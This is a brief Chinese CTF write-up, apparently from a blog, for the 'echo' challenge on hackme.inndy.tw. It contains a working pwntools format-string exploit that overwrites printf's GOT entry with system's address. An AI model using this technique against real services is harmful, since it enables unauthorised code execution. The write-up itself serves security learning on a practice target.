echo

作者: 2mpossible | 来源:发表于2018-08-17 16:15 被阅读0次

Echo 少女时代
Shell 基本用法
goto
linux shell笔记(易忽略部分)
windows批处理获取时间日期
网卡设置
PHP_MySQL-双引号与单引号
Linuxshellscrips
Echo ，再见，Echo
rcS 文件

教科书般的格式化字符串漏洞，先找到偏移为7

然后将prinf_got地址改成system地址即可

exp:

from pwn import * 

#p = process('./echo')
p = remote('hackme.inndy.tw',7711)
elf = ELF('./echo')
offset = 7
printf_got = elf.got['printf']
system_addr = elf.plt['system']

payload = fmtstr_payload(offset,{printf_got:system_addr})
p.sendline(payload)

p.interactive()

Echo 少女时代
Echo 少女时代 (Echo Echo Echo Echo Echo~ Echo~ 喏噶腾男加亲家桥厄米...
Shell 基本用法
预定义变量 echo $PWD echo $USER echo $HOME echo ~ echo $PATH e...
goto
linux shell笔记(易忽略部分)
echo echo -n 不加换行符echo -e 解释转义符 (echo -e "hello \t world"...
windows批处理获取时间日期
@echo off echo *** %DATE% echo *** %TIME% set THISDATE=%D...
网卡设置
@echo off echo ------------------------------------------...
PHP_MySQL-双引号与单引号
以echo为例 echo “$tireqty tires”; 与 echo ‘$tireqty tires';...
Linuxshellscrips
echo命令 echo嵌入变量 echo "Hello $LOGNAME, Have a nice day !" ...
Echo ，再见，Echo
荷西：Echo，你等我六年，我有四年大学要念，还有两年兵役要服，六年一过，我就娶你。荷西：我的愿望是拥有一栋小小...
rcS 文件
#!/bin/sh echo "********************************" echo " ...